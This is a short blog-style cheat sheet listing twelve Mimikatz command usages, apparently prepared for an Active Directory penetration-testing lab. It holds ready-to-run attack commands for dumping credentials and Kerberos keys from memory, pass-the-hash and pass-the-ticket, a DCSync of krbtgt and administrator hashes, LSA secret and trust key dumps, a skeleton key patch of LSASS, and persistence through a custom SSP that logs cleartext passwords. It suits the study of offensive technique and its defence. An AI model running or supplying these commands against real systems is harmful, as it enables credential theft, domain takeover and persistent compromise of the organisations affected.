ToolsFebruary 9, 20261 min readby 0xt0pus

Mimikatz

Windows credential extraction tool for dumping passwords, hashes, and Kerberos tickets

#active-directory#windows#credential-dumping

Mimikatz

Description

Mimikatz is used for credential dumping, pass-the-hash, pass-the-ticket, golden ticket, silver ticket, and many more Active Directory attacks. Invoke-Mimikatz is the PowerShell port that loads mimikatz reflectively into memory. Always run with NT Authority System privileges.

Usage 1: Dump Credentials (sekurlsa::ekeys)

Dump encryption keys from memory.

Command:

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Usage 2: Pass the Hash

Over-pass-the-hash attack to spawn a new PowerShell session as another user.

Command:

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /aes256:<AES256-KEY> /run:powershell.exe"'

Usage 3: DCSync Attack

Replicate domain controller data to extract credentials.

Command:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'

Command (Extract admin hash from another domain):

Invoke-Mimikatz -Command '"lsadump::dcsync /user:tech\administrator"'

Usage 4: Pass the Ticket

Inject a Kerberos ticket into the current session.

Command:

Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Usage 5: Export Kerberos Tickets

Command:

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Command (Alternative):

Invoke-Mimikatz -Command '"kerberos::list /export"'

Usage 6: Dump LSA Secrets

Command:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

Usage 7: Dump Trust Keys

Command:

invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc

Usage 8: Skeleton Key Attack

Patch LSASS to accept a master password for all accounts.

Command:

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moenycorp.local

Usage 9: Custom SSP (Persistence)

Log local logons, service account and machine account passwords in clear text.

Command:

Invoke-Mimikatz -Command '"misc::memssp"'

Usage 10: DSRM Persistence

Dump DSRM administrator password.

Command:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName dcorp-dc

Usage 11: Running mimikatz.exe Directly

Command:

.\mimikatz.exe
mimikatz # sekurlsa::ekeys

Usage 12: Loading Mimikatz in Meterpreter

Command:

load mimikatz
mimikatz_command -f *::